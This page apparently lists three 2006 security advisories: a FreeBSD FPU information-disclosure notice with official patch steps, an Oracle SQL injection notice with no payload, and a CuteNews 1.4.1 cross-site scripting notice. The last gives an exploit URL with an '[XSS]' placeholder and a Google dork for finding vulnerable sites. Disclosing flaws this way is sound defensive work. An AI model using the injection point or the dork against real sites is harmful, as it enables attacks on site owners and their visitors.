FreeBSD Security Advisory FreeBSD-SA-06:14.fpu
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 = FreeBSD-SA-06:14.fpuSecurity Advisory The FreeBSD Project Topic: FPU information disclosure Category: core Module: sys Announced: 2006-04-19 Credits:Jan Beulich Affects:All FreeBSD/i386 and FreeBSD/amd64 releases. Corrected: 2006-04-19 07:00:35 UTC (RELENG_6, 6.1-STABLE) 2006-04-19 07:00:50 UTC (RELENG_6_1, 6.1-RELEASE) 2006-04-19 07:01:12 UTC (RELENG_6_0, 6.0-RELEASE-p7) 2006-04-19 07:01:30 UTC (RELENG_5, 5.5-STABLE) 2006-04-19 07:01:53 UTC (RELENG_5_4, 5.4-RELEASE-p14) 2006-04-19 07:02:23 UTC (RELENG_5_3, 5.3-RELEASE-p29) 2006-04-19 07:02:43 UTC (RELENG_4, 4.11-STABLE) 2006-04-19 07:03:01 UTC (RELENG_4_11, 4.11-RELEASE-p17) 2006-04-19 07:03:14 UTC (RELENG_4_10, 4.10-RELEASE-p23) CVE Name: CVE-2006-1056 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit http://www.freebsd.org/security/>. I. Background The floating-point unit (FPU) of i386 and amd64 processors is derived from the original 8087 floating-point co-processor. As a result, the FPU contains the same debugging registers FOP, FIP, and FDP which store the opcode, instruction address, and data address of the instruction most recently executed by the FPU. On processors implementing the "SSE" instruction set, a new pair of instructions fxsave/fxrstor replaces the earlier fsave/frstor pair used for saving and restoring the FPU state. These new instructions also save and restore the contents of the additional registers used by SSE instructions. II. Problem Description On "7th generation" and "8th generation" processors manufactured by AMD, including the AMD Athlon, Duron, Athlon MP, Athlon XP, Athlon64, Athlon64 FX, Opteron, Turion, and Sempron, the fxsave and fxrstor instructions do not save and restore the FOP, FIP, and FDP registers unless the exception summary bit (ES) in the x87 status word is set to 1, indicating that an unmasked x87 exception has occurred. This behaviour is consistent with documentation provided by AMD, but is different from processors from other vendors, which save and restore the FOP, FIP, and FDP registers regardless of the value of the ES bit. As a result of this discrepancy remaining unnoticed until now, the FreeBSD kernel does not restore the contents of the FOP, FIP, and FDP registers between context switches. III. Impact On affected processors, a local attacker can monitor the execution path of a process which uses floating-point operations. This may allow an attacker to steal cryptographic keys or other sensitive information. IV. Workaround No workaround is available, but systems which do not use AMD Athlon, Duron, Athlon MP, Athlon XP, Athlon64, Athlon64 FX, Opteron, Turion, or Sempron processors are not vulnerable. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 4-STABLE, 5-STABLE, or 6-STABLE, or to the RELENG_6_0, RELENG_5_4, RELENG_5_3, RELENG_4_11, or RELENG_4_10 security branch dated after the correction date. 2) To patch your present system: The following patches have been verified to apply to FreeBSD 4.10, 4.11, 5.3, 5.4, and 6.0 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 4.x] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu4x.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu4x.patch.asc [FreeBSD 5.x and 6.x] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu.patch.asc b) Apply the patch. # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Branch Revision Path - - RELENG_4 src/sys/i386/isa/npx.c 1.80.2.4 RELENG_4_11 src/UPDATING 1.73.2.91.2.18 src/sys/conf/newvers.sh 1.44.2.39.2.21 src/sys/i386/isa/npx.c1.80.2.3.14.1 RELENG_4_10 src/UPDATING 1.73.2.90.2.24 src/sys/conf/newvers.sh 1.44.2.34.2.25 src/sys/i386/isa/npx.c
SQL Injection in package SYS.DBMS_LOGMNR_SESSION
SQL Injection in package SYS.DBMS_LOGMNR_SESSION NameSQL Injection in package SYS.DBMS_LOGMNR_SESSION Systems AffectedOracle Database SeverityMedium Risk CategorySQL Injection (DB06) Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Advisory18 April 2006 (V 1.00) Oracle Bugid6980723 Details ### The package SYS.DBMS_LOGMNR_SESSION contains a SQL injection vulnerability in the procedure DELETE_FROM_TABLE. Oracle fixed this problem by using the package DBMS_ASSERT. This advisory ## http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_logmnr_session.html Patch Information # Apply the patches for Oracle CPU April 2006 on top of Oracle 9i Release 2 or Oracle 10g Release 1. The patches are available via Oracle Metalink. History ### 01-nov-2005 Oracle secalert was informed 02-nov-2005 Oracle secalert asked for an exploit 18-apr-2006 Oracle published CPU April 2006 18-apr-2006 Advisory published Additional information ## An analysis of the Oracle CPU April 2006 is available here http://www.red-database-security.com/advisory/oracle_cpu_apr_2006.html Many (40+) open security issues in Oracle are still unfixed http://www.red-database-security.com/advisory/upcoming_alerts.html
CuteNews 1.4.1 <= Cross Site Scripting
// CuteNews 1.4.1 <= Cross Site Scripting // - [~] Advisory by: LoK-Crew ~ Snake_23 [-] Exploit: http://www.example.com/index.php?mod=editnews&action=editnews&id=1145397112&source=[XSS] [-] Googledork: Powered by CuteNews 1.4.1 [+] Greetz to: PHCN [+] Visit: www.LoK-Crew.de.am
